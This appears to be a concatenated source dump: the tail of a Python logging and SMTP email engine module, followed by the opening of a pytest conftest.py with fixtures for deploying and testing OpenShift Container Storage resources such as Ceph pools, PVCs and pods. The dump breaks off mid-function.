self.add_null_handler()
if SETTINGS["log.console"]:
self.add_console_handler()
self.register_event()
def add_null_handler(self):
"""
Add null handler for logger.
"""
null_handler = logging.NullHandler()
self.logger.addHandler(null_handler)
def add_console_handler(self):
"""
Add console output of log.
"""
console_handler = logging.StreamHandler()
console_handler.setLevel(self.level)
console_handler.setFormatter(self.formatter)
self.logger.addHandler(console_handler)
def register_event(self):
""""""
self.event_engine.register(EVENT_LOG, self.process_log_event)
def process_log_event(self, event: Event):
"""
Output log event data with logging function.
"""
log = event.data
self.logger.log(log.log_level, log.log_content)
def close(self):
""""""
pass
class EmailEngine(BaseEngine):
"""
邮件引擎
"""
def __init__(self, event_engine: EventEngine):
""""""
super(EmailEngine, self).__init__(event_engine, "email")
self.thread = Thread(target=self.run)
self.queue = Queue()
self.active = False
def send_email(self, subject: str, content: str, receiver: str = ""):
""""""
# Start email engine when sending first email.
if not self.active:
self.start()
# Use default receiver if not specified.
if not receiver:
receiver = SETTINGS["email.receiver"]
msg = EmailMessage()
msg["From"] = SETTINGS["email.sender"]
msg["To"] = SETTINGS["email.receiver"]
msg["Subject"] = subject
msg.set_content(content)
self.queue.put(msg)
def run(self):
""""""
while self.active:
try:
msg = self.queue.get(block=True, timeout=1)
with smtplib.SMTP_SSL(SETTINGS["email.server"], SETTINGS["email.port"]) as smtp:
smtp.login(SETTINGS["email.username"], SETTINGS["email.password"])
smtp.send_message(msg)
except Empty:
pass
def start(self):
""""""
self.active = True
self.thread.start()
def close(self):
""""""
if not self.active:
return
self.active = False
self.thread.join()
|
conftest.py
|
import logging
import os
import random
import time
import tempfile
import threading
from concurrent.futures.thread import ThreadPoolExecutor
from datetime import datetime
from math import floor
from shutil import copyfile
from functools import partial
from botocore.exceptions import ClientError
import pytest
from ocs_ci.deployment import factory as dep_factory
from ocs_ci.framework import config
from ocs_ci.framework.pytest_customization.marks import (
deployment,
ignore_leftovers,
tier_marks,
ignore_leftover_label,
)
from ocs_ci.ocs import constants, defaults, fio_artefacts, node, ocp, platform_nodes
from ocs_ci.ocs.bucket_utils import craft_s3_command
from ocs_ci.ocs.exceptions import (
CommandFailed,
TimeoutExpiredError,
CephHealthException,
ResourceWrongStatusException,
UnsupportedPlatformError,
)
from ocs_ci.ocs.mcg_workload import mcg_job_factory as mcg_job_factory_implementation
from ocs_ci.ocs.node import get_node_objs, schedule_nodes
from ocs_ci.ocs.ocp import OCP
from ocs_ci.ocs.resources import pvc
from ocs_ci.ocs.utils import setup_ceph_toolbox, collect_ocs_logs
from ocs_ci.ocs.resources.backingstore import (
backingstore_factory as backingstore_factory_implementation,
)
from ocs_ci.ocs.resources.namespacestore import (
namespace_store_factory as namespacestore_factory_implementation,
)
from ocs_ci.ocs.resources.bucketclass import (
bucket_class_factory as bucketclass_factory_implementation,
)
from ocs_ci.ocs.resources.cloud_manager import CloudManager
from ocs_ci.ocs.resources.cloud_uls import (
cloud_uls_factory as cloud_uls_factory_implementation,
)
from ocs_ci.ocs.node import check_nodes_specs
from ocs_ci.ocs.resources.mcg import MCG
from ocs_ci.ocs.resources.objectbucket import BUCKET_MAP
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.ocs.resources.pod import (
get_rgw_pods,
delete_deploymentconfig_pods,
get_pods_having_label,
get_deployments_having_label,
Pod,
)
from ocs_ci.ocs.resources.pvc import PVC, create_restore_pvc
from ocs_ci.ocs.version import get_ocs_version, report_ocs_version
from ocs_ci.ocs.cluster_load import ClusterLoad, wrap_msg
from ocs_ci.utility import aws
from ocs_ci.utility import deployment_openshift_logging as ocp_logging_obj
from ocs_ci.utility import templating
from ocs_ci.utility import users, kms as KMS
from ocs_ci.utility.environment_check import (
get_status_before_execution,
get_status_after_execution,
)
from ocs_ci.utility.flexy import load_cluster_info
from ocs_ci.utility.prometheus import PrometheusAPI
from ocs_ci.utility.uninstall_openshift_logging import uninstall_cluster_logging
from ocs_ci.utility.utils import (
ceph_health_check,
ceph_health_check_base,
get_running_ocp_version,
get_openshift_client,
get_system_architecture,
get_testrun_name,
load_auth_config,
ocsci_log_path,
skipif_ocp_version,
skipif_ocs_version,
TimeoutSampler,
skipif_upgraded_from,
update_container_with_mirrored_image,
)
from ocs_ci.helpers import helpers
from ocs_ci.helpers.helpers import create_unique_resource_name
from ocs_ci.ocs.bucket_utils import get_rgw_restart_counts
from ocs_ci.ocs.pgsql import Postgresql
from ocs_ci.ocs.resources.rgw import RGW
from ocs_ci.ocs.jenkins import Jenkins
from ocs_ci.ocs.couchbase import CouchBase
from ocs_ci.ocs.amq import AMQ
from ocs_ci.ocs.elasticsearch import ElasticSearch
from ocs_ci.ocs.ui.base_ui import login_ui, close_browser
from ocs_ci.ocs.ripsaw import RipSaw
log = logging.getLogger(__name__)
class OCSLogFormatter(logging.Formatter):
def __init__(self):
fmt = (
"%(asctime)s - %(threadName)s - %(levelname)s - %(name)s.%(funcName)s.%(lineno)d "
"- %(message)s"
)
super(OCSLogFormatter, self).__init__(fmt)
def pytest_logger_config(logger_config):
logger_config.add_loggers([""], stdout_level="info")
logger_config.set_log_option_default("")
logger_config.split_by_outcome()
logger_config.set_formatter_class(OCSLogFormatter)
def pytest_collection_modifyitems(session, items):
"""
A pytest hook to filter out skipped tests satisfying
skipif_ocs_version or skipif_upgraded_from
Args:
session: pytest session
config: pytest config object
items: list of collected tests
"""
teardown = config.RUN["cli_params"].get("teardown")
deploy = config.RUN["cli_params"].get("deploy")
if not (teardown or deploy):
for item in items[:]:
skipif_ocp_version_marker = item.get_closest_marker("skipif_ocp_version")
skipif_ocs_version_marker = item.get_closest_marker("skipif_ocs_version")
skipif_upgraded_from_marker = item.get_closest_marker(
"skipif_upgraded_from"
)
if skipif_ocp_version_marker:
skip_condition = skipif_ocp_version_marker.args
# skip_condition will be a tuple
# and condition will be first element in the tuple
if skipif_ocp_version(skip_condition[0]):
log.info(
f"Test: {item} will be skipped due to OCP {skip_condition}"
)
items.remove(item)
continue
if skipif_ocs_version_marker:
skip_condition = skipif_ocs_version_marker.args
# skip_condition will be a tuple
# and condition will be first element in the tuple
if skipif_ocs_version(skip_condition[0]):
log.info(f"Test: {item} will be skipped due to {skip_condition}")
items.remove(item)
continue
if skipif_upgraded_from_marker:
skip_args = skipif_upgraded_from_marker.args
if skipif_upgraded_from(skip_args[0]):
log.info(
f"Test: {item} will be skipped because the OCS cluster is"
f" upgraded from one of these versions: {skip_args[0]}"
)
items.remove(item)
@pytest.fixture()
def supported_configuration():
"""
Check that cluster nodes have enough CPU and Memory as described in:
https://access.redhat.com/documentation/en-us/red_hat_openshift_container_storage/4.2/html-single/planning_your_deployment/index#infrastructure-requirements_rhocs
This fixture is intended as a prerequisite for tests or fixtures that
run flaky on configurations that don't meet minimal requirements.
Minimum requirements for each starting node (OSD+MON):
16 CPUs
64 GB memory
Last documentation check: 2020-02-21
"""
min_cpu = constants.MIN_NODE_CPU
min_memory = constants.MIN_NODE_MEMORY
log.info("Checking if system meets minimal requirements")
if not check_nodes_specs(min_memory=min_memory, min_cpu=min_cpu):
err_msg = (
f"At least one of the worker nodes doesn't meet the "
f"required minimum specs of {min_cpu} vCPUs and {min_memory} RAM"
)
pytest.xfail(err_msg)
@pytest.fixture(scope="session", autouse=True)
def auto_load_auth_config():
try:
auth_config = {"AUTH": load_auth_config()}
config.update(auth_config)
except FileNotFoundError:
pass # If auth file doesn't exist we just ignore.
@pytest.fixture(scope="class")
def secret_factory_class(request):
return secret_factory_fixture(request)
@pytest.fixture(scope="session")
def secret_factory_session(request):
return secret_factory_fixture(request)
@pytest.fixture(scope="function")
def secret_factory(request):
return secret_factory_fixture(request)
def secret_factory_fixture(request):
"""
Secret factory. Calling this fixture creates a new secret.
RBD based is default.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(interface=constants.CEPHBLOCKPOOL):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
"""
secret_obj = helpers.create_secret(interface_type=interface)
assert secret_obj, "Failed to create a secret"
instances.append(secret_obj)
return secret_obj
def finalizer():
"""
Delete the RBD secrets
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="session", autouse=True)
def log_ocs_version(cluster):
"""
Fixture handling version reporting for OCS.
This fixture handles alignment of the version reporting, so that we:
* report version for each test run (no matter if just deployment, just
test or both deployment and tests are executed)
* prevent conflict of version reporting with deployment/teardown (eg. we
should not run the version logging before actual deployment, or after
a teardown)
Version is reported in:
* log entries of INFO log level during test setup phase
* ocs_version file in cluster path directory (for copy pasting into bug
reports)
"""
teardown = config.RUN["cli_params"].get("teardown")
deploy = config.RUN["cli_params"].get("deploy")
dev_mode = config.RUN["cli_params"].get("dev_mode")
skip_ocs_deployment = config.ENV_DATA["skip_ocs_deployment"]
if teardown and not deploy:
log.info("Skipping version reporting for teardown.")
return
elif dev_mode:
log.info("Skipping version reporting for development mode.")
return
elif skip_ocs_deployment:
log.info("Skipping version reporting since OCS deployment is skipped.")
return
cluster_version, image_dict = get_ocs_version()
file_name = os.path.join(
config.ENV_DATA["cluster_path"], "ocs_version." + datetime.now().isoformat()
)
with open(file_name, "w") as file_obj:
report_ocs_version(cluster_version, image_dict, file_obj)
log.info("human readable ocs version info written into %s", file_name)
@pytest.fixture(scope="class")
def ceph_pool_factory_class(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
@pytest.fixture(scope="session")
def ceph_pool_factory_session(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
@pytest.fixture(scope="function")
def ceph_pool_factory(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
def ceph_pool_factory_fixture(request, replica=3, compression=None):
"""
Create a Ceph pool factory.
Calling this fixture creates new Ceph pool instance.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL, replica=replica, compression=compression
):
if interface == constants.CEPHBLOCKPOOL:
ceph_pool_obj = helpers.create_ceph_block_pool(
replica=replica, compression=compression
)
elif interface == constants.CEPHFILESYSTEM:
cfs = ocp.OCP(
kind=constants.CEPHFILESYSTEM, namespace=defaults.ROOK_CLUSTER_NAMESPACE
).get(defaults.CEPHFILESYSTEM_NAME)
ceph_pool_obj = OCS(**cfs)
assert ceph_pool_obj, f"Failed to create {interface} pool"
if interface != constants.CEPHFILESYSTEM:
instances.append(ceph_pool_obj)
return ceph_pool_obj
def finalizer():
"""
Delete the Ceph block pool
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def storageclass_factory_class(request, ceph_pool_factory_class, secret_factory_class):
return storageclass_factory_fixture(
request, ceph_pool_factory_class, secret_factory_class
)
@pytest.fixture(scope="session")
def storageclass_factory_session(
request, ceph_pool_factory_session, secret_factory_session
):
return storageclass_factory_fixture(
request, ceph_pool_factory_session, secret_factory_session
)
@pytest.fixture(scope="function")
def storageclass_factory(request, ceph_pool_factory, secret_factory):
return storageclass_factory_fixture(request, ceph_pool_factory, secret_factory)
def storageclass_factory_fixture(
request,
ceph_pool_factory,
secret_factory,
):
"""
Create a storage class factory. Default is RBD based.
Calling this fixture creates new storage class instance.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
secret=None,
custom_data=None,
sc_name=None,
reclaim_policy=constants.RECLAIM_POLICY_DELETE,
replica=3,
compression=None,
new_rbd_pool=False,
pool_name=None,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
secret (object): An OCS instance for the secret.
custom_data (dict): If provided then storageclass object is created
by using these data. Parameters `block_pool` and `secret`
are not useds but references are set if provided.
sc_name (str): Name of the storage class
replica (int): Replica size for a pool
compression (str): Compression type option for a pool
new_rbd_pool (bool): True if user wants to create new rbd pool for SC
pool_name (str): Existing pool name to create the storageclass other
then the default rbd pool.
Returns:
object: helpers.create_storage_class instance with links to
block_pool and secret.
"""
if custom_data:
sc_obj = helpers.create_resource(**custom_data)
else:
secret = secret or secret_factory(interface=interface)
if interface == constants.CEPHBLOCKPOOL:
if config.ENV_DATA.get("new_rbd_pool") or new_rbd_pool:
pool_obj = ceph_pool_factory(
interface=interface,
replica=config.ENV_DATA.get("replica") or replica,
compression=config.ENV_DATA.get("compression") or compression,
)
interface_name = pool_obj.name
else:
if pool_name is None:
interface_name = helpers.default_ceph_block_pool()
else:
interface_name = pool_name
elif interface == constants.CEPHFILESYSTEM:
interface_name = helpers.get_cephfs_data_pool_name()
sc_obj = helpers.create_storage_class(
interface_type=interface,
interface_name=interface_name,
secret_name=secret.name,
sc_name=sc_name,
reclaim_policy=reclaim_policy,
)
assert sc_obj, f"Failed to create {interface} storage class"
sc_obj.secret = secret
instances.append(sc_obj)
return sc_obj
def finalizer():
"""
Delete the storageclass
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def project_factory_class(request):
return project_factory_fixture(request)
@pytest.fixture(scope="session")
def project_factory_session(request):
return project_factory_fixture(request)
@pytest.fixture()
def project_factory(request):
return project_factory_fixture(request)
@pytest.fixture()
def project(project_factory):
"""
This fixture creates a single project instance.
"""
project_obj = project_factory()
return project_obj
def project_factory_fixture(request):
"""
Create a new project factory.
Calling this fixture creates new project.
"""
instances = []
def factory(project_name=None):
"""
Args:
project_name (str): The name for the new project
Returns:
object: ocs_ci.ocs.resources.ocs instance of 'Project' kind.
"""
proj_obj = helpers.create_project(project_name=project_name)
instances.append(proj_obj)
return proj_obj
def finalizer():
"""
Delete the project
"""
for instance in instances:
try:
ocp_event = ocp.OCP(kind="Event", namespace=instance.namespace)
events = ocp_event.get()
event_count = len(events["items"])
warn_event_count = 0
for event in events["items"]:
if event["type"] == "Warning":
warn_event_count += 1
log.info(
(
"There were %d events in %s namespace before it's"
" removal (out of which %d were of type Warning)."
" For a full dump of this event list, see DEBUG logs."
),
event_count,
instance.namespace,
warn_event_count,
)
except Exception:
# we don't want any problem to disrupt the teardown itself
log.exception("Failed to get events for project %s", instance.namespace)
ocp.switch_to_default_rook_cluster_project()
instance.delete(resource_name=instance.namespace)
instance.wait_for_delete(instance.namespace, timeout=300)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def pvc_factory_class(request, project_factory_class):
return pvc_factory_fixture(request, project_factory_class)
@pytest.fixture(scope="session")
def pvc_factory_session(request, project_factory_session):
return pvc_factory_fixture(request, project_factory_session)
@pytest.fixture(scope="function")
def pvc_factory(request, project_factory):
return pvc_factory_fixture(
request,
project_factory,
)
def pvc_factory_fixture(request, project_factory):
"""
Create a persistent Volume Claim factory. Calling this fixture creates new
PVC. For custom PVC provide 'storageclass' parameter.
"""
instances = []
active_project = None
active_rbd_storageclass = None
active_cephfs_storageclass = None
def factory(
interface=constants.CEPHBLOCKPOOL,
project=None,
storageclass=None,
size=None,
access_mode=constants.ACCESS_MODE_RWO,
custom_data=None,
status=constants.STATUS_BOUND,
volume_mode=None,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
storageclass (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'StorageClass' kind.
size (int): The requested size for the PVC
access_mode (str): ReadWriteOnce, ReadOnlyMany or ReadWriteMany.
This decides the access mode to be used for the PVC.
ReadWriteOnce is default.
custom_data (dict): If provided then PVC object is created
by using these data. Parameters `project` and `storageclass`
are not used but reference is set if provided.
status (str): If provided then factory waits for object to reach
desired state.
volume_mode (str): Volume mode for PVC.
eg: volume_mode='Block' to create rbd `block` type volume
Returns:
object: helpers.create_pvc instance.
"""
if custom_data:
pvc_obj = PVC(**custom_data)
pvc_obj.create(do_reload=False)
else:
nonlocal active_project
nonlocal active_rbd_storageclass
nonlocal active_cephfs_storageclass
project = project or active_project or project_factory()
active_project = project
if interface == constants.CEPHBLOCKPOOL:
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
active_rbd_storageclass = storageclass
elif interface == constants.CEPHFILESYSTEM:
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
active_cephfs_storageclass = storageclass
pvc_size = f"{size}Gi" if size else None
pvc_obj = helpers.create_pvc(
sc_name=storageclass.name,
namespace=project.namespace,
size=pvc_size,
do_reload=False,
access_mode=access_mode,
volume_mode=volume_mode,
)
assert pvc_obj, "Failed to create PVC"
if status:
helpers.wait_for_resource_state(pvc_obj, status)
pvc_obj.storageclass = storageclass
pvc_obj.project = project
pvc_obj.access_mode = access_mode
instances.append(pvc_obj)
return pvc_obj
def finalizer():
"""
Delete the PVC
"""
pv_objs = []
# Get PV form PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
# If they have ReclaimPolicy set to Retain then delete them manually
for pv_obj in pv_objs:
if (
pv_obj.data.get("spec").get("persistentVolumeReclaimPolicy")
== constants.RECLAIM_POLICY_RETAIN
):
helpers.wait_for_resource_state(pv_obj, constants.STATUS_RELEASED)
pv_obj.delete()
pv_obj.ocp.wait_for_delete(pv_obj.name)
else:
# Workaround for bug 1915706, increasing timeout from 180 to 720
timeout = (
720
if config.ENV_DATA["platform"].lower() == constants.AZURE_PLATFORM
else 180
)
pv_obj.ocp.wait_for_delete(resource_name=pv_obj.name, timeout=timeout)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def pod_factory_class(request, pvc_factory_class):
return pod_factory_fixture(request, pvc_factory_class)
@pytest.fixture(scope="session")
def pod_factory_session(request, pvc_factory_session):
return pod_factory_fixture(request, pvc_factory_session)
@pytest.fixture(scope="function")
def pod_factory(request, pvc_factory):
return pod_factory_fixture(request, pvc_factory)
def pod_factory_fixture(request, pvc_factory):
"""
Create a Pod factory. Calling this fixture creates new Pod.
For custom Pods provide 'pvc' parameter.
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
pvc=None,
custom_data=None,
status=constants.STATUS_RUNNING,
node_name=None,
pod_dict_path=None,
raw_block_pv=False,
deployment_config=False,
service_account=None,
replica_count=1,
command=None,
command_args=None,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
pvc (PVC object): ocs_ci.ocs.resources.pvc.PVC instance kind.
custom_data (dict): If provided then Pod object is created
by using these data. Parameter `pvc` is not used but reference
is set if provided.
status (str): If provided then factory waits for object to reach
desired state.
node_name (str): The name of specific node to schedule the pod
pod_dict_path (str): YAML path for the pod.
raw_block_pv (bool): True for creating raw block pv based pod,
False otherwise.
deployment_config (bool): True for DeploymentConfig creation,
False otherwise
service_account (OCS): Service account object, in case DeploymentConfig
is to be created
replica_count (int): The replica count for deployment config
command (list): The command to be executed on the pod
command_args (list): The arguments to be sent to the command running
on the pod
Returns:
object: helpers.create_pod instance
"""
sa_name = service_account.name if service_account else None
if custom_data:
pod_obj = helpers.create_resource(**custom_data)
else:
pvc = pvc or pvc_factory(interface=interface)
pod_obj = helpers.create_pod(
pvc_name=pvc.name,
namespace=pvc.namespace,
interface_type=interface,
node_name=node_name,
pod_dict_path=pod_dict_path,
raw_block_pv=raw_block_pv,
dc_deployment=deployment_config,
sa_name=sa_name,
replica_count=replica_count,
command=command,
command_args=command_args,
)
assert pod_obj, "Failed to create pod"
if deployment_config:
dc_name = pod_obj.get_labels().get("name")
dc_ocp_dict = ocp.OCP(
kind=constants.DEPLOYMENTCONFIG, namespace=pod_obj.namespace
).get(resource_name=dc_name)
dc_obj = OCS(**dc_ocp_dict)
instances.append(dc_obj)
else:
instances.append(pod_obj)
if status:
helpers.wait_for_resource_state(pod_obj, status)
pod_obj.reload()
pod_obj.pvc = pvc
if deployment_config:
return dc_obj
return pod_obj
def finalizer():
"""
Delete the Pod or the DeploymentConfig
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def teardown_factory_class(request):
return teardown_factory_fixture(request)
@pytest.fixture(scope="session")
def teardown_factory_session(request):
return teardown_factory_fixture(request)
@pytest.fixture(scope="function")
def teardown_factory(request):
return teardown_factory_fixture(request)
def teardown_factory_fixture(request):
"""
Tearing down a resource that was created during the test
To use this factory, you'll need to pass 'teardown_factory' to your test
function and call it in your test when a new resource was created and you
want it to be removed in teardown phase:
def test_example(self, teardown_factory):
pvc_obj = create_pvc()
teardown_factory(pvc_obj)
"""
instances = []
def factory(resource_obj):
"""
Args:
resource_obj (OCS object or list of OCS objects) : Object to teardown after the test
"""
if isinstance(resource_obj, list):
instances.extend(resource_obj)
else:
instances.append(resource_obj)
def finalizer():
"""
Delete the resources created in the test
"""
for instance in instances[::-1]:
if not instance.is_deleted:
reclaim_policy = (
instance.reclaim_policy if instance.kind == constants.PVC else None
)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
if reclaim_policy == constants.RECLAIM_POLICY_DELETE:
helpers.validate_pv_delete(instance.backed_pv)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def service_account_factory_class(request):
return service_account_factory_fixture(request)
@pytest.fixture(scope="session")
def service_account_factory_session(request):
return service_account_factory_fixture(request)
@pytest.fixture(scope="function")
def service_account_factory(request):
return service_account_factory_fixture(request)
def service_account_factory_fixture(request):
"""
Create a service account
"""
instances = []
active_service_account_obj = None
def factory(project=None, service_account=None):
"""
Args:
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
service_account (str): service_account_name
Returns:
object: serviceaccount instance.
"""
nonlocal active_service_account_obj
if active_service_account_obj and not service_account:
return active_service_account_obj
elif service_account:
sa_obj = helpers.get_serviceaccount_obj(
sa_name=service_account, namespace=project.namespace
)
if not helpers.validate_scc_policy(
sa_name=service_account, namespace=project.namespace
):
helpers.add_scc_policy(
sa_name=service_account, namespace=project.namespace
)
sa_obj.project = project
active_service_account_obj = sa_obj
instances.append(sa_obj)
return sa_obj
else:
sa_obj = helpers.create_serviceaccount(
namespace=project.namespace,
)
sa_obj.project = project
active_service_account_obj = sa_obj
helpers.add_scc_policy(sa_name=sa_obj.name, namespace=project.namespace)
assert sa_obj, "Failed to create serviceaccount"
instances.append(sa_obj)
return sa_obj
def finalizer():
"""
Delete the service account
"""
for instance in instances:
helpers.remove_scc_policy(
sa_name=instance.name, namespace=instance.namespace
)
instance.delete()
instance.ocp.wait_for_delete(resource_name=instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def dc_pod_factory(request, pvc_factory, service_account_factory):
"""
Create deploymentconfig pods
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
pvc=None,
service_account=None,
size=None,
custom_data=None,
node_name=None,
node_selector=None,
replica_count=1,
raw_block_pv=False,
sa_obj=None,
wait=True,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
pvc (PVC object): ocs_ci.ocs.resources.pvc.PVC instance kind.
service_account (str): service account name for dc_pods
size (int): The requested size for the PVC
custom_data (dict): If provided then Pod object is created
by using these data. Parameter `pvc` is not used but reference
is set if provided.
node_name (str): The name of specific node to schedule the pod
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
replica_count (int): Replica count for deployment config
raw_block_pv (str): True if pod with raw block pvc
sa_obj (object) : If specific service account is needed
"""
if custom_data:
dc_pod_obj = helpers.create_resource(**custom_data)
else:
pvc = pvc or pvc_factory(interface=interface, size=size)
sa_obj = sa_obj or service_account_factory(
project=pvc.project, service_account=service_account
)
dc_pod_obj = helpers.create_pod(
interface_type=interface,
pvc_name=pvc.name,
do_reload=False,
namespace=pvc.namespace,
sa_name=sa_obj.name,
dc_deployment=True,
replica_count=replica_count,
node_name=node_name,
node_selector=node_selector,
raw_block_pv=raw_block_pv,
pod_dict_path=constants.FEDORA_DC_YAML,
)
instances.append(dc_pod_obj)
log.info(dc_pod_obj.name)
if wait:
helpers.wait_for_resource_state(
dc_pod_obj, constants.STATUS_RUNNING, timeout=180
)
dc_pod_obj.pvc = pvc
return dc_pod_obj
def finalizer():
"""
Delete dc pods
"""
for instance in instances:
delete_deploymentconfig_pods(instance)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="session", autouse=True)
def polarion_testsuite_properties(record_testsuite_property, pytestconfig):
"""
Configures polarion testsuite properties for junit xml
"""
polarion_project_id = config.REPORTING["polarion"]["project_id"]
record_testsuite_property("polarion-project-id", polarion_project_id)
jenkins_build_url = config.RUN.get("jenkins_build_url")
if jenkins_build_url:
record_testsuite_property("polarion-custom-description", jenkins_build_url)
polarion_testrun_name = get_testrun_name()
record_testsuite_property("polarion-testrun-id", polarion_testrun_name)
record_testsuite_property("polarion-testrun-status-id", "inprogress")
record_testsuite_property("polarion-custom-isautomated", "True")
@pytest.fixture(scope="session", autouse=True)
def additional_testsuite_properties(record_testsuite_property, pytestconfig):
"""
Configures additional custom testsuite properties for junit xml
"""
# add logs url
logs_url = config.RUN.get("logs_url")
if logs_url:
record_testsuite_property("logs-url", logs_url)
@pytest.fixture(scope="session")
def tier_marks_name():
"""
Gets the tier mark names
Returns:
list: list of tier mark names
"""
tier_marks_name = []
for each_tier in tier_marks:
try:
tier_marks_name.append(each_tier.name)
except AttributeError:
tier_marks_name.append(each_tier().args[0].name)
return tier_marks_name
@pytest.fixture(scope="function", autouse=True)
def health_checker(request, tier_marks_name):
skipped = False
dev_mode = config.RUN["cli_params"].get("dev_mode")
if dev_mode:
log.info("Skipping health checks for development mode")
return
def finalizer():
if not skipped:
try:
teardown = config.RUN["cli_params"]["teardown"]
skip_ocs_deployment = config.ENV_DATA["skip_ocs_deployment"]
if not (teardown or skip_ocs_deployment):
ceph_health_check_base()
log.info("Ceph health check passed at teardown")
except CephHealthException:
log.info("Ceph health check failed at teardown")
# Retrying to increase the chance the cluster health will be OK
# for next test
ceph_health_check()
raise
node = request.node
request.addfinalizer(finalizer)
for mark in node.iter_markers():
if mark.name in tier_marks_name:
log.info("Checking for Ceph Health OK ")
try:
status = ceph_health_check_base()
if status:
log.info("Ceph health check passed at setup")
return
except CephHealthException:
skipped = True
# skip because ceph is not in good health
pytest.skip("Ceph health check failed at setup")
@pytest.fixture(scope="session", autouse=True)
def cluster(request, log_cli_level):
"""
This fixture initiates deployment for both OCP and OCS clusters.
Specific platform deployment classes will handle the fine details
of action
"""
log.info(f"All logs located at {ocsci_log_path()}")
teardown = config.RUN["cli_params"]["teardown"]
deploy = config.RUN["cli_params"]["deploy"]
if teardown or deploy:
factory = dep_factory.DeploymentFactory()
deployer = factory.get_deployment()
# Add a finalizer to teardown the cluster after test execution is finished
if teardown:
def cluster_teardown_finalizer():
# If KMS is configured, clean up the backend resources
# we are doing it before OCP cleanup
if config.DEPLOYMENT.get("kms_deployment"):
kms = KMS.get_kms_deployment()
kms.cleanup()
deployer.destroy_cluster(log_cli_level)
request.addfinalizer(cluster_teardown_finalizer)
log.info("Will teardown cluster because --teardown was provided")
# Download client
force_download = (
config.RUN["cli_params"].get("deploy")
and config.DEPLOYMENT["force_download_client"]
)
get_openshift_client(force_download=force_download)
# set environment variable for early testing of RHCOS
if config.ENV_DATA.get("early_testing"):
release_img = config.ENV_DATA["RELEASE_IMG"]
log.info(f"Running early testing of RHCOS with release image: {release_img}")
os.environ["RELEASE_IMG"] = release_img
os.environ["OPENSHIFT_INSTALL_RELEASE_IMAGE_OVERRIDE"] = release_img
if deploy:
# Deploy cluster
deployer.deploy_cluster(log_cli_level)
@pytest.fixture(scope="class")
def environment_checker(request):
node = request.node
# List of marks for which we will ignore the leftover checker
marks_to_ignore = [m.mark for m in [deployment, ignore_leftovers]]
# app labels of resources to be excluded for leftover check
exclude_labels = [constants.must_gather_pod_label]
for mark in node.iter_markers():
if mark in marks_to_ignore:
return
if mark.name == ignore_leftover_label.name:
exclude_labels.extend(list(mark.args))
request.addfinalizer(
partial(get_status_after_execution, exclude_labels=exclude_labels)
)
get_status_before_execution(exclude_labels=exclude_labels)
@pytest.fixture(scope="session")
def log_cli_level(pytestconfig):
"""
Retrieves the log_cli_level set in pytest.ini
Returns:
str: log_cli_level set in pytest.ini or DEBUG if not set
"""
return pytestconfig.getini("log_cli_level") or "DEBUG"
@pytest.fixture(scope="session", autouse=True)
def cluster_load(
request,
project_factory_session,
pvc_factory_session,
service_account_factory_session,
pod_factory_session,
):
"""
Run IO during the test execution
"""
cl_load_obj = None
io_in_bg = config.RUN.get("io_in_bg")
log_utilization = config.RUN.get("log_utilization")
io_load = config.RUN.get("io_load")
cluster_load_error = None
cluster_load_error_msg = (
"Cluster load might not work correctly during this run, because "
"it failed with an exception: %s"
)
# IO load should not happen during deployment
deployment_test = (
True if ("deployment" in request.node.items[0].location[0]) else False
)
if io_in_bg and not deployment_test:
io_load = int(io_load) * 0.01
log.info(wrap_msg("Tests will be running while IO is in the background"))
log.info(
"Start running IO in the background. The amount of IO that "
"will be written is going to be determined by the cluster "
"capabilities according to its limit"
)
try:
cl_load_obj = ClusterLoad(
project_factory=project_factory_session,
sa_factory=service_account_factory_session,
pvc_factory=pvc_factory_session,
pod_factory=pod_factory_session,
target_percentage=io_load,
)
cl_load_obj.reach_cluster_load_percentage()
except Exception as ex:
log.error(cluster_load_error_msg, ex)
cluster_load_error = ex
if (log_utilization or io_in_bg) and not deployment_test:
if not cl_load_obj:
